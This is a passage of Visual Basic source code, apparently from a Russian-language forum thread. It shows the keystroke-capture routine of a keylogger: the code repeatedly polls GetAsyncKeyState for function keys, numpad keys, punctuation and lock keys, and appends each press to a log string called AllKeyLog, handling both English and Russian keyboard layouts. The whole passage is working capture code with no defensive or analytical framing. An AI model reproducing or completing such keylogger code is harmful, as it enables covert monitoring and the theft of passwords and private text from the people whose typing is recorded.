If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "\"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "|"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "/"
End If
End If
keystate = Getasynckeystate(&HDD)
If Shift = 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "]"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ъ"
End If
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "}"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ъ"
End If
End If
keystate = Getasynckeystate(&HDE)
If Shift = 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "'"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "э"
End If
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + Chr$(34)
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Э"
End If
End If
keystate = Getasynckeystate(vbKeyMultiply)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "*"
End If
keystate = Getasynckeystate(vbKeyDivide)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "/"
End If
keystate = Getasynckeystate(vbKeyAdd)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "+"
End If
keystate = Getasynckeystate(vbKeySubtract)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "-"
End If
keystate = Getasynckeystate(vbKeyDecimal)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{Del or ,}"
End If
keystate = Getasynckeystate(vbKeyF1)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F1}"
End If
keystate = Getasynckeystate(vbKeyF2)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F2}"
End If
keystate = Getasynckeystate(vbKeyF3)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F3}"
End If
keystate = Getasynckeystate(vbKeyF4)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F4}"
End If
keystate = Getasynckeystate(vbKeyF5)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F5}"
End If
keystate = Getasynckeystate(vbKeyF6)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F6}"
End If
keystate = Getasynckeystate(vbKeyF7)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F7}"
End If
keystate = Getasynckeystate(vbKeyF8)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F8}"
End If
DoEvents
keystate = Getasynckeystate(vbKeyF9)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F9}"
End If
keystate = Getasynckeystate(vbKeyF10)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F10}"
End If
keystate = Getasynckeystate(vbKeyF11)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F11}"
End If
keystate = Getasynckeystate(vbKeyF12)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{F12}"
End If
keystate = Getasynckeystate(vbKeyNumlock)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{NumLock}"
End If
keystate = Getasynckeystate(vbKeyScrollLock)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{ScrollLock}"
End If
keystate = Getasynckeystate(vbKeyPrint)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{PrintScreen}"
End If
keystate = Getasynckeystate(vbKeyPageUp)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{PageUp}"
End If
keystate = Getasynckeystate(vbKeyPageDown)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{Pagedown}"
End If
keystate = Getasynckeystate(vbKeyNumpad1)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "1"
End If
keystate = Getasynckeystate(vbKeyNumpad2)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "2"
End If
keystate = Getasynckeystate(vbKeyNumpad3)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "3"
End If
keystate = Getasynckeystate(vbKeyNumpad4)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "4"
End If
DoEvents
keystate = Getasynckeystate(vbKeyNumpad5)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "5"
End If
keystate = Getasynckeystate(vbKeyNumpad6)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "6"
End If
keystate = Getasynckeystate(vbKeyNumpad7)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "7"
End If
keystate = Getasynckeystate(vbKeyNumpad8)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "8"
End If
keystate = Getasynckeystate(vbKeyNumpad9)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "9"
End If
keystate = Getasynckeystate(vbKeyNumpad0)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "0"
End If
End Sub
Ответить
Страница: 1 |
Поиск по форуму